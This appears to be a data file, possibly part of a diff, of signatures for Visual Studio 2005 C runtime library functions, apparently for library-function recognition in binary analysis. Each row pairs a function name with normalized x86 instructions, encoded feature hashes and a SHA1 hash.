+??_Gexception@@UAEPAXI@Z,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nPOP R32\nRETN CONST",gP0ifgAAAAAAAAAAwi7OqAAAAAAAAAAA+nrC6ID9In7CLs6o,[],0ad94760a66131d112b4894076eb99a364149876,VS2005,LIBC.LIB
+??0exception@@QAE@XZ,"MOV R32,R32\nAND DWORD PTR DS:[R32+CONST],0\nAND DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nRETN",nu1dJgAAAAAAAAAA,[],7d55152aa9c92be4ea634ec945aff5672ff966c8,VS2005,LIBC.LIB
+??0exception@@QAE@ABV0@@Z,"PUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nINC R32\nPUSH R32\nCALL CONST\nPOP R32\nMOV DWORD PTR DS:[R32+CONST],R32\nTEST R32,R32",+Hf5wV8iGcAAAAAAP9Ml8fh3+cHucgJV7nICVV8iGcD2Qk5M9kJOTF8iGcAAAAAAXyIZwAAAAAAAAAAA,[],d5180a6c613ad7ae6083a10dad5a762bcefa0262,VS2005,LIBC.LIB
+??1exception@@UAE@XZ,"CMP DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nJCC CONST",dQAHLAGhdbMAAAAAAaF1swAAAAAAAAAANrJVTAGhdbN1AAcs,[],ee5de584e44fabdfde2dd571e08ad19a19157af7,VS2005,LIBC.LIB
+??0exception@@QAE@ABQBD@Z,"PUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nMOV DWORD PTR DS:[R32],0\nPUSH DWORD PTR DS:[R32]\nCALL CONST\nINC R32",S3pD7wAAAAAAAAAAy5vqiUt6Q+9FBvnzRQb580t6Q+8AAAAA,[],cc2572e90a8c22df4b8f5aefefd3e3252350fd6c,VS2005,LIBC.LIB
+?what@exception@@UBEPBDXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nTEST R32,R32\nJCC CONST",LlW5/gGhdbMqs0LeAaF1swAAAAAAAAAAKrNC3gGhdbMAAAAA,[],cf38e8494c34eefdbe05d0075ef2f5029ca93d05,VS2005,LIBC.LIB
+??4exception@@QAEAAV0@ABV0@@Z,"PUSH R32\nMOV R32,R32\nCMP R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",cMiU5ID9In78P/BfgP0ifgAAAAAAAAAA/D/wX4D9In4AAAAA,[],a88c1e03a6377f077cc77513e2fd85db6ba21548,VS2005,LIBC.LIB
+__mbclen,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nMOVZX R32,BYTE PTR DS:[R32]\nTEST BYTE PTR DS:[R32+CONST],CONST\nPOP R32\nSETNE R8\nINC R32\nRETN",7x1KygAAAAAAAAAA,[],6e28c0f8de5b62fb103ebdae0e237a0c3b7506cb,VS2005,LIBC.LIB
+__read,"MOV R32,R32\nAND R32,CONST\nSAR R32,CONST\nSHL CONST2,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nMOV R32,DWORD PTR DS:[R32*4]\nADD R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]",AN9OVUL41tYAAAAAW9AV4P0Boelh6phpoDc6oUL41tYAAAAAj7ebKkL41tYAAAAAy7YZnV2CubCchlE4cug6Rd084CkUxIhqFMSIat084Cmn6f7inIZROF2CubCSjD03p+n+4kPjWxgAAAAA3TzgKQDfTlUVcVwgJKOZXEL41tYAAAAAkow9N98TwOVh6phpQvjW1gAAAAAAAAAA/QGh6QHcjotbP0M+YeqYaWvgci6TRn60Q+NbGADfTlUVcVwgk0Z+tPs1OUYAAAAALmVDn4+3myocmrDlWURf7vs1OUYAAAAAFXFcIAe9WvHYzQSm3xPA5dHYUdAnD3USWz9DPru2XCywDNdDJw91EtHYUdBr4HIu2M0EpjNGwZxZRF/uijKxKgHcjotbP0M+a+ByLmp+6bkAAAAAHJqw5Y+3mypOSbmj0dhR0Ps1OUZdgrmwsAzXQySjmVwAAAAAM0bBnKNHxlwOQkRsDkJEbOzPmQfjoqt8XYK5sBVxXCBeo4Mn46KrfGvgci4AAAAAan7puRVxXCBeo4Mn+zU5RhVxXCBeo4MnZnkxNUL41tYAAAAA7M+ZB/s1OUYAAAAAu7ZcLFbR0FxmeTE1VtHQXCSjmVwAAAAATkm5o2Z5MTVb0BXgXqODJwDfTlUAAAAAo0fGXJyGUTjLthmdB71a8QDfTlW91j5TYeqYaf0BoemKMrEqAdyOi6A3OqFy6DpFW9AV4GZ5MTVb0BXgvdY+U0L41tYAAAAA,[],5ff333a991970391df6e49a3103f970efc3baaf5,VS2005,LIBC.LIB
+__strlwr,"PUSH R32\nCALL CONST\nCMP R32,R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",XqODJ06gi7EAAAAAgWLOaE6gi7HkmpT0kCvO9fwE5oMKX6KQCl+ikPwE5oNuY6ZFryH/9OSalPReo4MnTqCLsQAAAAAAAAAA5JqU9K8h//Rb0BXgW9AV4K8h//QJvlR1674MnpArzvWBYs5obmOmRfwE5oMwYW92Cb5Uda8h//QAAAAAMGFvdk6gi7EAAAAA/ATmg06gi7EAAAAA,[],b681a5e70cdad23765773b4441b0f8ee3eef0396,VS2005,LIBC.LIB
+__telli64,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",18Eo2wAAAAAAAAAA,oLEOBy6JAm4AAAAAvpK8Ey6JAm4AAAAAGaZm/76SvBMAAAAALokCbgAAAAAAAAAAy7YZnaCxDgc9ZCFoLgWUooN1ZekZpmb/8jwvCoZ2O+cuBZSig3Vl6aCxDgfLthmdPWQhaL6SvBMAAAAAhnY7576SvBMAAAAAgJBg3oZ2O+fyPC8K,0538d1fd0594e0b1e5e786b7ea2ecc9a3c9adcf0,VS2005,LIBC.LIB
+__dospawn,"LEA R32,DWORD PTR DS:[R32+R32*4+CONST]\nPUSH CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nMOVZX R32,R16\nPUSH R32\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nPOP R32",iJiAFgAAAAAAAAAAPUz/nh/maVUWxCowu7ZcLA1KU227tlwssAzXQ8SSpmgAAAAAd2SLLQAAAAAAAAAAQvjW1gAAAAAAAAAA7bGFKZj3QjMZAzqEwquJhru2XCwAAAAAFsQqMOSrVGIAAAAAu7ZcLLAM10OADWXnH+ZpVT1M/57ebTYt5KtUYj1M/57ebTYtV6b71EL41tYAAAAAn3GFhA1KU227tlwsxJKmaEL41tYAAAAAGQM6hJj3QjOexcQhJw91Et4VzyXNbCA9nIZRONexE2owQPBbzWwgPbu2XCwAAAAAMEDwW5yGUTgPAKXH3m02Ld4VzyXNbCA917ETapyGUTgPAKXHu7ZcLFhZdp8NzMABDczAAXLoOkUAAAAAWFl2n3LoOkUAAAAAnsXEITzOYSKY90Izcug6RZZz8F/Cq4mGmPdCMycPdRI9TP+eu7ZcLA1KU20hh3ljgA1l5+2xhSlhmoGJDUpTbe2xhSlhmoGJlnPwX94VzyUAAAAAPM5hIpj3QjOexcQhj+LO/e2xhSlhmoGJ3hXPJZyGUThXpvvUYZqBiWGagYmuXOoKnIZROIiYgBYItQ6aDwClx3dkiy0AAAAArlzqCo/izv2061zOCLUOmndkiy0AAAAAIYd5Y7AM10O7tlwstOtczo/izv0AAAAA,[],f0204fbc1cd017284186000ba819338753f97177,VS2005,LIBC.LIB
+__wspawnl,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",UQMHEwAAAAAAAAAA,sRHxBAfo+Y9Lfz7Wcug6RSbu4WVy6DpFcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4MnTQTaVnLoOkWuDsvaXqODJ8KaPa0AAAAAB+j5j8KaPa0AAAAArg7L2nLoOkUAAAAAwpo9rXLoOkUAAAAAEqKMefQ42DZBG/+Acug6RfQ42DYSoox5cug6RUFF0Bu5m+6qQRv/gHHbI37EkqZouZvuqkFF0BsAAAAAQRv/gMSSpmjx1sdAQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAcdsjfgfo+Y9Lfz7W8dbHQPQ42DYAAAAA,1275c4d1b7faf7955970149b18add0278909293c,VS2005,LIBC.LIB
+__mbsnbcat,"MOV R32,R32\nSUB R32,DWORD PTR SS:[EBP+CONST]\nDEC R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nCMP R32,CONST",h0dSP3nT67kAAAAAedPrufUdNAEAAAAA9R00ATTg+sKMr4TVjK+E1enIAot8atTZfGrU2RD7xc1eo4MnXqODJ/zUKy0AAAAAft9z5RWiMVbLgsuVNOD6ws8K/YP81Cst/NQrLfUdNAFeo4MnXqODJ88K/YMAAAAAHgOGyqAdPDoAAAAA6cgCi88K/YMAAAAAEPvFzc8K/YMAAAAAFaIxVrCLNayQWW1Lzwr9gx4DhsrpyAKLkFltSzlafGAAAAAA6cgCi6AdPDoAAAAAy4LLlTlafGAAAAAAsIs1rFylOYkAAAAAOVp8YAAAAAAAAAAAoB08OjlafGAAAAAAXKU5iVylOYlvT3gNb094DXnT67mHR1I/,[],caf9e41ea54a1a276d114301a19f6502e8df9ed5,VS2005,LIBC.LIB
+_iswpunct,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,nO5/MGpjnt2igr0JooK9CWLtYE0AAAAAyv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAAamOe3UFF0Bus37PmYu1gTQAAAAAAAAAArN+z5gAAAAAAAAAA,8c544f73f58778a8357f9c123a76a0b8da837b35,VS2005,LIBC.LIB
+_iswascii,"CMP WORD PTR SS:[ESP+CONST],CONST\nSBB R32,R32\nNEG R32\nRETN",JG1EYwAAAAAAAAAA,[],9f7602b681fdbe71639d1a231975b3477ebda312,VS2005,LIBC.LIB
+_iswprint,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,QUXQG2LtYE0AAAAAooK9CWLtYE0AAAAAyv6+Lazfs+ac7n8wrN+z5gAAAAAAAAAAamOe3UFF0Bus37PmYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0J,56fc9006a6f975641d32182eb490b73028907bf8,VS2005,LIBC.LIB
+_iswgraph,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,Yu1gTQAAAAAAAAAAnO5/MGpjnt2igr0JooK9CWLtYE0AAAAAamOe3cX42h6s37Pmyv6+Lazfs+ac7n8wrN+z5gAAAAAAAAAAxfjaHgAAAAAAAAAA,d533c8fa684fbdba55dc50040e6dbf27eee15954,VS2005,LIBC.LIB
+_iswcntrl,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,yv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAAamOe3UFF0Bus37PmYu1gTQAAAAAAAAAArN+z5gAAAAAAAAAAnO5/MGpjnt2igr0JooK9CWLtYE0AAAAA,a98f89434ec98c3013736c78923324c9fd41c990,VS2005,LIBC.LIB
+_iswupper,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,yv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAAYu1gTQAAAAAAAAAAamOe3UFF0Bus37PmnO5/MGpjnt2igr0JrN+z5gAAAAAAAAAAooK9CWLtYE0AAAAA,32ea596e760bd0877de32af3ee3c0d5bf72bee02,VS2005,LIBC.LIB
+_iswdigit,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,xfjaHgAAAAAAAAAAooK9CWLtYE0AAAAArN+z5gAAAAAAAAAAyv6+Lazfs+ac7n8wamOe3cX42h6s37PmYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0J,d70e57a3a9f15630906407d41110c3c6ef89c838,VS2005,LIBC.LIB
+_iswspace,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,Yu1gTQAAAAAAAAAAnO5/MGpjnt2igr0JooK9CWLtYE0AAAAAxfjaHgAAAAAAAAAAyv6+Lazfs+ac7n8wrN+z5gAAAAAAAAAAamOe3cX42h6s37Pm,4829f0cf3660be4c0eb0ad94197cb0e3eb4d8940,VS2005,LIBC.LIB
+_iswalnum,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,yv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAAYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0JamOe3UFF0Bus37PmooK9CWLtYE0AAAAArN+z5gAAAAAAAAAA,1d67f63ab833fc82ce107f7ca184183c706c609c,VS2005,LIBC.LIB
+_iswlower,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,ooK9CWLtYE0AAAAAamOe3UFF0Bus37Pmyv6+Lazfs+ac7n8wrN+z5gAAAAAAAAAAQUXQG2LtYE0AAAAAYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0J,5ee6248be79144f44d199cbac598798116ff9325,VS2005,LIBC.LIB
+_iswalpha,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,nO5/MGpjnt2igr0JamOe3UFF0Bus37PmooK9CWLtYE0AAAAArN+z5gAAAAAAAAAAyv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAAYu1gTQAAAAAAAAAA,2fe81b1c57df541e4682534c39d285a350c87437,VS2005,LIBC.LIB
+_isleadbyte,"MOVZX R32,BYTE PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV R16,WORD PTR DS:[R32+R32*2]\nAND R32,CONST\nRETN",y6jeFwAAAAAAAAAA,[],880f9438e893322bce46b7ff13fe6c62b471eed4,VS2005,LIBC.LIB
+_iswxdigit,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,Yu1gTQAAAAAAAAAArN+z5gAAAAAAAAAAamOe3UFF0Bus37PmnO5/MGpjnt2igr0JooK9CWLtYE0AAAAAyv6+Lazfs+ac7n8wQUXQG2LtYE0AAAAA,90e2583e4d69872253a8e49fff52b09ac7d58242,VS2005,LIBC.LIB
+__ismbcgraph,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",6u+SKsm7klhclgqBa0R6qKzfs+at5OIJreTiCazfs+bP62Icz+tiHKzfs+ac7n8wXJYKgcm7klis37PmnO5/MKzfs+bJu5JY3WlkKervkiprRHqorN+z5gAAAAAAAAAAybuSWAAAAAAAAAAA,[],e5d8e6cd0c81161edbdcc1ee59ddd45de35b7a86,VS2005,LIBC.LIB
+___multtenpow12,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",uyGU9vAGYDBZ3Yd2uyGU9k6gi7HsJqWSIYd5Y7shlPaiA6a0Wd2Hdk6gi7EAAAAA7CalkvAGYDAAAAAATqCLsQAAAAAAAAAA8AZgMLshlPYjOGc7ogOmtLshlPbmHnGpTfoBtU6gi7Ehh3ljvPrzd/AGYDBZ3Yd2Snh8WPAGYDBZ3Yd2uyGU9rshlPbmHnGpIzhnO0p4fFi8+vN35h5xqU6gi7HsJqWS,[],690b22011868d62d08ca2d15b31404a0ba9d162d,VS2005,LIBC.LIB
+___ld12mul,"INC DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nDEC R32\nPOP R32\nJCC CONST",aeCIs5zufzDlrehKQUXQG19tfjAAAAAAX21+MP6wX7PLzBji1FTCtXriLDENzMABy8wY4lUdIJIAAAAADczAAdHL2lIAAAAAeuIsMSbu4WUOfm5+Jw91Eq6owtYdr+5mDn5ufibu4WXQZ5YQHa/uZicPdRKchlE4NRZyE1UdIJIAAAAArqjC1icPdRKchlE4VR0gkkL41tYAAAAAxuCPyZbuba8zI5M5iOpNO/6wX7MhH5WNMyOTOZbuba8AAAAAOvuA1Iz41Xg1FnITnIZROJzufzBc8lz9lu5tr8bgj8lxqBoxJu7hZYz41XgAAAAAXPJc/ZyGUThBuuBwjPjVeBsh4rgOfm5+nO5/MJyGUThBuuBwDn5ufhsh4ri7IZT2cagaMTqiNc5p4IizQbrgcF9tfjCchlE4uyGU9hsh4rg6+4DUQvjW1gAAAAAAAAAAOvuA1Bsh4rjRy9pS0cvaUkL41tYAAAAAaeCIs2ngiLMnD3USnIZROEFF0BsHLsvXBy7L16A3OqH4Pk1XGyHiuHGoGjGWyDUO5a3oSq6owtYdr+5mJw91Es/rYhzJXS6H0GeWEIz41Xg6+4DU+D5NV5Z8m6+/dwbPyV0uhycPdRLP62IcOqI1znGoGjGWyDUOv3cGz19tfjAAAAAAIR+Vjf6wX7PUVMK1IR+Vjf6wX7MhH5WNlsg1Dsbgj8kAAAAAlnybr19tfjAAAAAAz+tiHJzufzBp4Iiz/rBfs0L41tYAAAAAoDc6oV9tfjAAAAAA,[],9519afa63ca4813f7da9a0f11b0fc175f773f17c,VS2005,LIBC.LIB
+__mbsupr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nCMP BYTE PTR DS:[R32],0\nJCC CONST",s/cJwR4DhsoAAAAAulSEWQ3MwAErEZv70AUFsGGagYkAAAAAGPPByibu4WUNZrFWYZqBiQ1msVYm7uFlKxGb+2GagYnQBQWwJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAADczAATlafGAAAAAAHgOGymGagYkAAAAADWaxVn/Xkai6VIRZf9eRqB4Dhsqz9wnB,[],b1fbadf4c263557db4899f28852a330761ffbcf4,VS2005,LIBC.LIB
+__mbsnbcnt,"MOV R32,R32\nDEC R32\nTEST R32,R32\nJCC CONST",6P6B0PzUKy0AAAAA/NQrLbygXeiP4s79h0dSP7ygXegAAAAAvKBd6AAAAAAAAAAAj+LO/bygXegp6uhIKeroSOj+gdBhmoGJOqSkNPzUKy0AAAAAYZqBiYdHUj/o/oHQ,[],2c8e560c6194922b063f12d88d8f9951a0f16cd8,VS2005,LIBC.LIB
+__setmaxstdio,"MOV R32,R32\nSHL CONST,CONST\nPUSH R32\nPUSH DWORD PTR DS:[0]\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32",Fb2qxCSjmVzWpQo8RnF8rSGHeWP8Ewg0/BMINCSjmVxLqX1g1qUKPCAWOYIAAAAAJKOZXCAWOYIAAAAAIBY5ggAAAAAAAAAAS6l9YEJOFARFy1z4wrxAVgAAAAAAAAAARctc+CAWOYIAAAAAQk4UBCAWOYIAAAAAIYd5Y6QJHQkNzMABDczAASAWOYIAAAAApAkdCXLoOkUAAAAAcug6Rbu2XCxGk6MERpOjBOj+gdAnD3USJw91EiSjmVy5m+6qrSX+ScK8QFatkX8CuZvuquj+gdAAAAAA6P6B0HLoOkUAAAAAJKOZXLu2XCwAAAAArZF/AsK8QFZGcXytu7ZcLCAWOYIVvarE,[],e09957a16f0df034876474024720ab94e1de339c,VS2005,LIBC.LIB
+__getmaxstdio,"MOV R32,DWORD PTR DS:[0]\nRETN",DcG51AAAAAAAAAAA,[],a84f246eb814acab8074ce2b2fff3668005d5e94,VS2005,LIBC.LIB
+__execvp,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,x3TTycJ8zYDAM1YKVtebJeA6CxgAAAAA4DoLGIPcznvYzQSmEezkE9CtDlnA/6zU2M0EpoPcznt1V5C6NXgBMoLEzKg1eAEywDNWCsJ8zYDAM1YKdVeQuoPczntp6fP6aenz+o/izv0AAAAANXgBMtCtDlmCxMyog9zOe7KZyKxKXPt2gsTMqEh5C9E1eAEySlz7diGHeWMAAAAAwDNWCsJ8zYAnRqqeNXgBMtCtDllIeQvRspnIrCGHeWMAAAAAIYd5YxHs5BOns1c7p7NXO9CtDlnA/6zUJ0aqniK0grvSRCIqSHkL0dCtDlnbHu7G0kQiKsJ8zYAitIK72x7uxuA6CxjQrQ5ZIrSCu8J8zYCkKqSR0K0OWQAAAAAAAAAAj+LO/YPcznvYzQSmwnzNgAAAAAAAAAAApCqkkcJ8zYBW15slwP+s1Eh5C9E1eAEy,48684e913a5fff862e7f45666ae48ce40ee7eddd,VS2005,LIBC.LIB
+_srand,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[0],R32\nRETN",7sGTZgAAAAAAAAAA,[],5e2d86072a94278eefb18ff7e3fb5968d526e846,VS2005,LIBC.LIB
+_rand,"MOV R32,DWORD PTR DS:[0]\nIMUL R32,R32,CONST\nADD R32,CONST\nMOV DWORD PTR DS:[0],R32\nSAR R32,CONST\nAND R32,CONST\nRETN",FyYPOAAAAAAAAAAA,[],6008626f63046d44e3749f6cd560f65c071cd0a4,VS2005,LIBC.LIB
+__cexit,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",DTSfeQAAAAAAAAAA,muIBA8Zr930V4s36xmv3fZriAQNuQlA6PrF1SADh1msjp+G/bkJQOsZr930V4s36h1PxPgDh1msjp+G/S6l9YIdT8T77ydYTAOHWawAAAAAAAAAARsZuhT6xdUhLqX1gkgGyPT6xdUhLqX1g+8nWExXizfrGa/d9FeLN+gDh1msjp+G/G48cT5IBsj1Gxm6FI6fhvwAAAAAAAAAA,6e88c25051097127ba0038a26810a1d3dd0f2941,VS2005,LIBC.LIB
+__cinit,"PUSH CONST\nPUSH CONST\nCALL CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",S6l9YA17SK2SejCOknowjg17SK0AAAAADXtIrQAAAAAAAAAA,[],923ef6a44183259d00ea64768bfe1c1318f4f3a1,VS2005,LIBC.LIB
+__c_exit,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",DTSfeQAAAAAAAAAA,muIBA8Zr930V4s36S6l9YIdT8T77ydYTAOHWawAAAAAAAAAAh1PxPgDh1msjp+G/kgGyPT6xdUhLqX1g+8nWExXizfrGa/d9FeLN+gDh1msjp+G/G48cT5IBsj1Gxm6FRsZuhT6xdUhLqX1gI6fhvwAAAAAAAAAAxmv3fZriAQNuQlA6PrF1SADh1msjp+G/bkJQOsZr930V4s36,a6c2893e77f793f38d0274cd0e27eddd20eb9b61,VS2005,LIBC.LIB
+_exit,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,I6fhvwAAAAAAAAAAbkJQOsZr930V4s36xmv3fZriAQNuQlA6PrF1SADh1msjp+G/+8nWExXizfrGa/d9muIBA8Zr930V4s36S6l9YIdT8T77ydYTAOHWawAAAAAAAAAAkgGyPT6xdUhLqX1gh1PxPgDh1msjp+G/FeLN+gDh1msjp+G/G48cT5IBsj1Gxm6FRsZuhT6xdUhLqX1g,e6096cf6220cea20c3fcabc2c0747617d137b875,VS2005,LIBC.LIB
+__exit,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,RsZuhT6xdUhLqX1gkgGyPT6xdUhLqX1g+8nWExXizfrGa/d9h1PxPgDh1msjp+G/G48cT5IBsj1Gxm6FI6fhvwAAAAAAAAAAxmv3fZriAQNuQlA6PrF1SADh1msjp+G/bkJQOsZr930V4s36muIBA8Zr930V4s36S6l9YIdT8T77ydYTAOHWawAAAAAAAAAAFeLN+gDh1msjp+G/,22ad51ba051634f5cd4a075a3e13d490a4a269eb,VS2005,LIBC.LIB
+_fsetpos,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",DK9WCQAAAAAAAAAA,zJD8/CnrYdkAAAAAu7ZcLIPygRlX7odpJKOZXDlafGAAAAAAuiQ+F4PSWsAAAAAAOVp8YAAAAAAAAAAA2M0EpinrYdnYzQSmLlW5/lfuh2m7tlwsu7ZcLFfuh2m7tlws2M0EpinrYdlb0BXgW9AV4CnrYdkf58Fkg9JawNjNBKbMkPz8DczAATlafGAAAAAAg/KBGSSjmVwAAAAA56xD+oPygRkuVbn+Keth2SSjmVwNzMABV+6HaYPSWsC6JD4XH+fBZCSjmVwNzMAB,a1ff1816a72fca8404fa29461ca5190779c850db,VS2005,LIBC.LIB
+_system,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nXOR R32,R32",4WMWqsCuBPhy6DpFCqRm4E6gi7EAAAAAu7ZcLE6gi7F7JghIWd6yw06gi7EPIdWqDyHVqnsmCEi7tlwsUAeYGk6gi7EAAAAAeyYISAqkZuCWc/BfDczAAU6gi7EAAAAATqCLsQAAAAAAAAAAwK4E+HsmCEhZ3rLDlnPwXwqkZuAAAAAAcug6RVAHmBoNzMAB,[],b573a3c51a01d519fb28bcf7d857624e235ecdab,VS2005,LIBC.LIB
+_fabs,FLD QWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nPOP R32\nDEC R32\nPOP R32,DgXTMrPlzI/llFMfUioUgsoe5oe9zMZS5ZRTHy6JAm4AAAAAs+XMjy6JAm4AAAAAgNjKxS6JAm4AAAAAvczGUoDYysWX2nuULokCbgAAAAAAAAAAyh7mhy6JAm4AAAAAdZWzUS6JAm4AAAAAl9p7lHWVs1EOBdMy,[],a777ee852222a12fada4eefbe04c974929d6ae1b,VS2005,LIBC.LIB
+__execve,"OR DWORD PTR SS:[EBP+CONST],CONST\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",fc0hB2xtJuNLfz7Wcug6RSbu4WVy6DpFcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNs7M3+RNBNpWwgXmgfh35W0AAAAA+HflbXLoOkVy6DpFTQTaVnLoOkXpXXtoXqODJ4xJJ/AAAAAAbG0m44xJJ/AAAAAA6V17aHLoOkUAAAAAjEkn8HLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZEhrUCcug6RUFF0Bu5m+6qzszf5KOqj/HEkqZoS38+1n3NIQdeo4MnuZvuqkFF0BsAAAAAQUXQG0L41tYAAAAARIa1AsSSpmjx1sdAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAo6qP8X3NIQcAAAAA8dbHQPQ42DYAAAAA,[],9506c98603376f0ddb39c19d2505105d061b699c,VS2005,LIBC.LIB
+_fseek,"PUSH R32\nCALL CONST\nADD DWORD PTR SS:[ESP+CONST],R32\nPOP R32\nXOR R32,R32\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR DS:[R32+CONST]",u7ZcLFfuh2m7tlwsg9JawNjNBKbMkPz8RSdf4j/DesUAAAAAVqIyPz/DesUAAAAA5omzDdjNBKbMkPz8u7ZcLHygXx1X7odpfKBfHQAAAAAAAAAAV+6HaYPSWsDmibMNFWI7+nygXx0WOAgizJD8/EUnX+IAAAAAP8N6xQAAAAAAAAAA2M0EpkUnX+LYzQSmFjgIIlfuh2m7tlws2M0EpkUnX+Jb0BXgW9AV4EUnX+JWojI/,[],b05df8890eefe56cb8d1fb64f174ebc7f94f14bd,VS2005,LIBC.LIB
+??YDName@@QAEAAV0@PAV0@@Z,"SHL R32,CONST\nSAR R32,CONST\nPUSH R32\nMOV R32,R32\nCALL CONST\nJMP SHORT CONST",JVm7enLoOkUAAAAAu7ZcLMxKMtHYXjYHXyIZwAAAAAAAAAAAUmjqW0LUHxPbmuiP2F42B18iGcAAAAAA25roj98TwOUAAAAA3xPA5V8iGcBV7Toycug6RUFF0BtRp99j25roj18iGcAAAAAAQUXQG98TwOUAAAAAJu7hZXLoOkUAAAAAzEoy0Sbu4WUlWbt6QtQfE8xKMtG7tlwsYUWyHF8iGcBSaOpbVe06Ml8iGcAAAAAAUaffY98TwOXbmuiP,[],ddba0f5ad8ae2fc7f711367a6b416f56175fc9f1,VS2005,LIBC.LIB
